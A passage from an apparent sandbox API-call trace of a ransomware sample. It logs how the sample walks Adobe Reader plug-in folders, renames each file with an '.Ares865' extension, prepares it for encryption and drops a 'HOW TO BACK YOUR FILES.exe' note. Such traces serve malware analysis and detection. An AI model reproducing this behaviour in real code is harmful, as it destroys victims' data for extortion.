(in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.979] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.983] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.984] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.984] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.985] lstrcpyW (in: lpString1=0x2cce498, lpString2="QuickTime.CZE" | out: lpString1="QuickTime.CZE") returned="QuickTime.CZE" [0172.985] lstrlenW (lpString="QuickTime.CZE") returned 13 [0172.985] lstrlenW (lpString="Ares865") returned 7 [0172.985] lstrcmpiW (lpString1="ime.CZE", lpString2="Ares865") returned 1 [0172.985] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\QuickTime.CZE.Ares865") returned 97 [0172.985] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\QuickTime.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\quicktime.cze"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\QuickTime.CZE.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\quicktime.cze.ares865"), dwFlags=0x1) returned 1 [0172.987] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\QuickTime.CZE.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\quicktime.cze.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.987] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.987] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.988] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.988] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.990] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.991] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.991] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.991] lstrcpyW (in: lpString1=0x2cce498, lpString2="WindowsMedia.CZE" | out: lpString1="WindowsMedia.CZE") returned="WindowsMedia.CZE" [0172.991] lstrlenW (lpString="WindowsMedia.CZE") returned 16 [0172.992] lstrlenW (lpString="Ares865") returned 7 [0172.992] lstrcmpiW (lpString1="dia.CZE", lpString2="Ares865") returned 1 [0172.992] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\WindowsMedia.CZE.Ares865") returned 100 [0172.992] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\WindowsMedia.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\windowsmedia.cze"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\WindowsMedia.CZE.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\windowsmedia.cze.ares865"), dwFlags=0x1) returned 1 [0172.994] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\WindowsMedia.CZE.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\windowsmedia.cze.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.994] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.994] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.995] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.995] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.997] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.998] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.998] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.998] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP" [0172.999] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP" [0172.999] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0172.999] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\how to back your files.exe"), bFailIfExists=1) returned 0 [0173.000] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0173.000] GetLastError () returned 0x0 [0173.001] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0173.001] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x549b99e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x549b99e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0173.001] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.001] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0173.001] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.CAT.Ares865" | out: lpString1="Flash.CAT.Ares865") returned="Flash.CAT.Ares865" [0173.001] lstrlenW (lpString="Flash.CAT.Ares865") returned 17 [0173.001] lstrlenW (lpString="Ares865") returned 7 [0173.001] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0173.001] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d6d7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Flash.CHS", cAlternateFileName="")) returned 1 [0173.001] lstrcmpiW (lpString1="Flash.CHS", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0173.001] lstrcmpiW (lpString1="Flash.CHS", lpString2="aoldtz.exe") returned 1 [0173.001] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.CHS" | out: lpString1="Flash.CHS") returned="Flash.CHS" [0173.001] lstrlenW (lpString="Flash.CHS") returned 9 [0173.001] lstrlenW (lpString="Ares865") returned 7 [0173.001] lstrcmpiW (lpString1="ash.CHS", lpString2="Ares865") returned 1 [0173.002] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.CHS.Ares865") returned 89 [0173.002] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.chs"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.CHS.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.chs.ares865"), dwFlags=0x1) returned 1 [0173.004] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.CHS.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.chs.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.004] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.004] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.005] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.005] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.007] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.008] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.008] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.008] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.CHT" | out: lpString1="Flash.CHT") returned="Flash.CHT" [0173.008] lstrlenW (lpString="Flash.CHT") returned 9 [0173.008] lstrlenW (lpString="Ares865") returned 7 [0173.008] lstrcmpiW (lpString1="ash.CHT", lpString2="Ares865") returned 1 [0173.009] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.CHT.Ares865") returned 89 [0173.009] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.cht"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.CHT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.cht.ares865"), dwFlags=0x1) returned 1 [0173.011] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.CHT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.cht.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.011] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.012] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.012] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.012] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.016] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.017] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.017] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.018] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.DAN" | out: lpString1="Flash.DAN") returned="Flash.DAN" [0173.018] lstrlenW (lpString="Flash.DAN") returned 9 [0173.018] lstrlenW (lpString="Ares865") returned 7 [0173.018] lstrcmpiW (lpString1="ash.DAN", lpString2="Ares865") returned 1 [0173.018] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.DAN.Ares865") returned 89 [0173.018] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.dan"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.DAN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.dan.ares865"), dwFlags=0x1) returned 1 [0173.020] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.DAN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.dan.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.021] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.021] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.022] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.022] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.031] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.032] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.032] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.033] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.DEU" | out: lpString1="Flash.DEU") returned="Flash.DEU" [0173.033] lstrlenW (lpString="Flash.DEU") returned 9 [0173.033] lstrlenW (lpString="Ares865") returned 7 [0173.033] lstrcmpiW (lpString1="ash.DEU", lpString2="Ares865") returned 1 [0173.033] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.DEU.Ares865") returned 89 [0173.033] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.deu"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.DEU.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.deu.ares865"), dwFlags=0x1) returned 1 [0173.037] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.DEU.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.deu.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.037] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.037] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.038] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.038] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.040] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.041] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.041] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.042] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.ESP" | out: lpString1="Flash.ESP") returned="Flash.ESP" [0173.042] lstrlenW (lpString="Flash.ESP") returned 9 [0173.042] lstrlenW (lpString="Ares865") returned 7 [0173.042] lstrcmpiW (lpString1="ash.ESP", lpString2="Ares865") returned 1 [0173.042] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.ESP.Ares865") returned 89 [0173.042] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.esp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.ESP.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.esp.ares865"), dwFlags=0x1) returned 1 [0173.045] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.ESP.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.esp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.045] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.045] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.046] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.046] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.048] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.049] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.049] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.050] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.EUQ" | out: lpString1="Flash.EUQ") returned="Flash.EUQ" [0173.050] lstrlenW (lpString="Flash.EUQ") returned 9 [0173.050] lstrlenW (lpString="Ares865") returned 7 [0173.050] lstrcmpiW (lpString1="ash.EUQ", lpString2="Ares865") returned 1 [0173.050] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.EUQ.Ares865") returned 89 [0173.050] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.EUQ" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.euq"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.EUQ.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.euq.ares865"), dwFlags=0x1) returned 1 [0173.052] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.EUQ.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.euq.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.052] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.052] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.053] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.053] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.055] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.056] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.056] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.056] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.FRA" | out: lpString1="Flash.FRA") returned="Flash.FRA" [0173.056] lstrlenW (lpString="Flash.FRA") returned 9 [0173.056] lstrlenW (lpString="Ares865") returned 7 [0173.056] lstrcmpiW (lpString1="ash.FRA", lpString2="Ares865") returned 1 [0173.057] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.FRA.Ares865") returned 89 [0173.057] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.FRA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.fra"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.FRA.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.fra.ares865"), dwFlags=0x1) returned 1 [0173.060] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.FRA.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.fra.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0173.060] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0173.061] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0173.061] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0173.061] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.064] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0173.064] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0173.064] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0173.065] lstrcpyW (in: lpString1=0x2cce490, lpString2="Flash.ITA" | out: lpString1="Flash.ITA") returned="Flash.ITA" [0173.065] lstrlenW (lpString="Flash.ITA") returned 9 [0173.065] lstrlenW (lpString="Ares865") returned 7 [0173.065] lstrcmpiW (lpString1="ash.ITA", lpString2="Ares865") returned 1 [0173.065] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.ITA.Ares865") returned 89 [0173.065] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.ita"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.ITA.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.ita.ares865"), dwFlags=0x1) returned 1 [0173.068] 